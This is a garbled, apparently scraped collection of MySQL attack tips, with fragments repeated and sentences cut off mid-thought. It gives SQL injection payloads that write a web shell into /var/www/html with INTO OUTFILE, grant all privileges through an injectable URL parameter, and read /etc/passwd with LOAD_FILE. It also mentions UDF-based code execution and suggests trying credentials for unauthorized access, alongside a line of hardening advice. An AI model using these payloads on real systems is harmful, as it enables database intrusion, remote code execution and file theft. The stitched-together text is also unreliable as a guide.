Ensure the root user can only log in from localhost .
If you have the FILE privilege, you can drop a web shell into the server's web directory.
UNION SELECT 1, '', 3 INTO OUTFILE '/var/www/html/shell.php'; -- Use code with caution. 4. Database Privilege Escalation and RCE via UDF mysql hacktricks verified
:
: Use LOAD_FILE() to read sensitive local files or INTO OUTFILE to write webshells if permissions allow. Ensure the root user can only log in from localhost
Link the library to a usable SQL function:
http://example.com/vulnerable-page?id=1 UNION SELECT GRANT ALL PRIVILEGES ON *.* TO 'username'@'%' IDENTIFIED BY 'password' -- - INTO OUTFILE to read sensitive system files (like
SELECT LOAD_FILE('/etc/passwd');
: If the secure_file_priv variable is empty, using LOAD_DATA() , LOAD_FILE() , or SELECT ... INTO OUTFILE to read sensitive system files (like /etc/passwd ) or write a web shell.
If enabled, a malicious server can read files from a connecting client.
Try these credentials to see if you can gain unauthorized access to the database.